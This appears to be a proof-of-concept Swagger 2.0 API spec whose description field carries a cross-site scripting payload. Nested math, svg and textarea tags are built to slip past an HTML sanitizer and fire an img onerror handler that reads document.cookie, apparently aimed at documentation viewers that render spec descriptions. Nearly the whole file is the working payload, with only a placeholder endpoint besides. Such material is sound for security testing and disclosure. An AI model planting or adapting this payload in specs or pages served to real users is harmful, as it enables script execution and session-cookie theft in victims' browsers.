swagger: '2.0'
info:
  title: XSS PoC by MCHKLT
  description: |
    <math><mtext><option><FAKEFAKE><option></option><mglyph><svg><mtext><textarea><a title="</textarea><img src='#' onerror='alert(`XSS executed! Cookie: ${document.cookie} \nDomain: ${window.origin}`)'>">
  version: 1.0.0
basePath: /api
produces:
  - application/json
consumes:
  - application/json
paths:
  /test:
    get:
      summary: Test endpoint
      responses:
        '200':
          description: Successful response
